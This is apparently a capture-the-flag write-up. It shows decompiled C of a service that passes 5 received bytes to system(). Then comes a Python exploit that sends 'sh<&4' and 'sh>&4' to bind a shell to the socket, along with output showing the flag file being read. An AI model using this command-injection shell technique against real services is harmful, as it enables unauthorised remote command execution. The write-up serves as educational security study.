int __cdecl important_part(int fd)
{
/* Decompiler pseudo-C of the challenge's command handler. Reads at most 5
 * bytes from the socket `fd` into a zeroed 6-byte stack buffer and passes
 * that buffer straight to system(), so whatever the peer sends runs as a
 * shell command line: this is the command-injection sink. Returns the XOR
 * of the live and saved stack-protector values (0 when the frame is
 * intact); on a mismatch __stack_chk_fail is reached instead of return.
 * Remediation would be to never hand network bytes to system(): dispatch
 * on a fixed set of allowed commands or drop the shell entirely. */
int v1; // edx@1 -- decompiler temporaries, only forwarded to __stack_chk_fail
int v2; // ecx@1
int result; // eax@3
char cmd; // [sp+16h] [bp-12h]@1 -- first byte of the 6-byte command buffer zeroed below
int canary; // [sp+1Ch] [bp-Ch]@1 -- saved copy of the stack-protector value
canary = *MK_FP(__GS__, 20); // read the stack-protector reference value at gs:0x14
memset(&cmd, 0, 6u); // zero 6 bytes: one more than recv may write, so cmd stays NUL-terminated
if ( recv(fd, &cmd, 5u, 0) > 0 ) // recv only 5byte; any positive count (even 1 byte) reaches system(); 0 or -1 skips it
system(&cmd); // executes user input(5byte) -- untrusted network bytes run as a shell command, no validation
result = *MK_FP(__GS__, 20) ^ canary; // 0 when the saved value still matches
if ( *MK_FP(__GS__, 20) != canary )
__stack_chk_fail(v2, v1); // stack protector tripped: abort rather than return
return result;
}
This is the important part: it accepts only 5 bytes from the user and executes them as a shell command.
Idea: `sh<&4`, then `sh>&4`.
Exploit code:
#!/usr/bin/python
from socket import *
def shell():
    # One round of the interactive relay: prompt locally, forward the line
    # over the module-level socket `s` (created later in the script), and
    # print whatever the server sends back. Only a single recv() of up to
    # 1024 bytes is read per command, so longer or delayed output stays in
    # the socket until the next call.
    cmd = raw_input("$ ")
    s.send(cmd+"\n")
    print s.recv(1024)
# Client for the write-up's challenge service. The server reads at most
# 5 bytes per recv() and passes them to system() (see important_part
# above), which is the whole reason this works: there is no validation
# between the network and the shell.
s = socket(AF_INET,SOCK_STREAM)
s.connect(('10.211.55.4',8989))  # host/port used in the write-up (private-range address)
# Two 5-byte commands, matching the "idea" line above: redirect the
# server-side shell's stdin and then its stdout to descriptor 4. The
# write-up assumes that descriptor is the accepted connection on the
# server; that cannot be confirmed from the client side.
s.send("sh<&4")
s.send("sh>&4\n")
# The relay loop never exits on its own, so close() below is unreachable;
# the socket is released when the process ends (e.g. on Ctrl-C).
while True:
    shell()
s.close()
Result:
mangoui-MacBook-Pro:~ kjungi704$ ./givemeshell.py
$ cat key
this is key
clear!